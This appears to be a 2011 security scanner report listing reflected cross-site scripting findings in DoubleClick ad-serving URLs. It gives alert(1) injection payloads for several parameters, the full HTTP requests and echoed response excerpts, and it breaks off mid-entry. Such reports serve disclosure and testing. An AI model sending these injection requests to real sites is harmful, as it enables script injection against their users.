GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=la12e2"-alert(1)-"d2dd61e57b5&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 14:47:34 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 14:47:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7259
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... rl = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/f/1d1/%2a/p%3B234427567%3B0-0%3B0%3B50265525%3B2321-160/600%3B38432112/38449869/1%3B%3B%7Esscs%3D%3fhttp://adclick.g.doubleclick.net/aclk?sa=la12e2"-alert(1)-"d2dd61e57b5&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzg ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 420e2"-alert(1)-"3ee7a7f2227 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=420e2"-alert(1)-"3ee7a7f2227 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 4945 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 17:17:36 GMT Expires: Sun, 20 Mar 2011 17:17:36 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif ...[SNIP]... gEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=420e2"-alert(1)-"3ee7a7f2227http://www.dishnetwork.com/redirects/promotion/offer22/default.aspx?utm_source=google&utm_medium=display&utm_campaign=testbooyah"); var wmode = "opaque"; var bg = "ffffff"; var dcallowscriptaccess = "n ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8e99"-alert(1)-"97bc0f3b553 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQa8e99"-alert(1)-"97bc0f3b553&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:15:10 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:15:10 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3bafa"-alert(1)-"d8c8c6c02f6 was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-12546523889173693bafa"-alert(1)-"d8c8c6c02f6&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:17:04 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:17:04 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif ...[SNIP]... EuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-12546523889173693bafa"-alert(1)-"d8c8c6c02f6&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah"); var wmode = "opaque"; var bg = "ffffff"; var ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbc00"-alert(1)-"a8ca45bd5fa was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1bbc00"-alert(1)-"a8ca45bd5fa&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:15:45 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:15:45 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 561bf"-alert(1)-"af108c5ab54 was submitted in the sig parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ561bf"-alert(1)-"af108c5ab54&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:16:29 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:16:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 12,381 Template Name = In-Page Flash Banner w/ DoubleVerif ...[SNIP]... BB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ561bf"-alert(1)-"af108c5ab54&client=ca-pub-1254652388917369&adurl=http%3a%2f%2fwww.dishnetwork.com/redirects/promotion/offer22/default.aspx%3Futm_source%3Dgoogle%26utm_medium%3Ddisplay%26utm_campaign%3Dtestbooyah"); var wmode = " ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2783"-alert(1)-"7deaeb24a8f was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=la2783"-alert(1)-"7deaeb24a8f&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 17:14:41 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:14:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 4981
The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff315'-alert(1)-'17113cbd15f was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0ff315'-alert(1)-'17113cbd15f&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:54 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6736
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... B234167733%3B1-0%3B0%3B57514523%3B933-120/600%3B40960228/40978015/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0ff315'-alert(1)-'17113cbd15f&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2975056%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww. ...[SNIP]...
The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55fb1"-alert(1)-"3937b134a54 was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=055fb1"-alert(1)-"3937b134a54&tp=3&forced_click=;ord=20110320172908? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Sun, 20 Mar 2011 17:30:49 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 17:30:49 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6736
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... 2mdn.net/2981993/120x600_030411_CPO_GENERIC.jpg"; var minV = 6; var FWH = ' width="120" height="600" '; var url = escape("http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=055fb1"-alert(1)-"3937b134a54&tp=3&forced_click=http%3a%2f%2fdata.aggregateknowledge.com/pixel%21t%3D651%21%3Fche%3D2970103%26camid%3D5095412%26plaid%3D57514523%26creid%3D40960228%26adgid%3D234167733%26l1%3Dhttp%253A%252F%252Fwww. ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3ca3'-alert(1)-'54b41a5bbc9 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adj/N2998.134236.9345108740621/B5095412.5;sz=120x600;pc=[TPAS_ID];click=http://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=a3ca3'-alert(1)-'54b41a5bbc9 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/120_sidebar_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 6627 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 17:31:12 GMT Expires: Sun, 20 Mar 2011 17:31:12 GMT
document.write('<!-- Template Id = 14,337 Template Name = Watermark & DV Banner Creative (Flash) - In Page -->\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write( ...[SNIP]... 0%3B57514523%3B933-120/600%3B40789782/40807569/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=232134&mid=513855&m=3&sid=54113&c=0&tp=3&forced_click=a3ca3'-alert(1)-'54b41a5bbc9http://data.aggregateknowledge.com/pixel!t=651!?che=2992431&camid=5095412&plaid=57514523&creid=40789782&adgid=234167733&l1=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fpromotion%2Fspecialoffers.jsp%3Fc ...[SNIP]...
The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73347"-alert(1)-"54369acb972 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
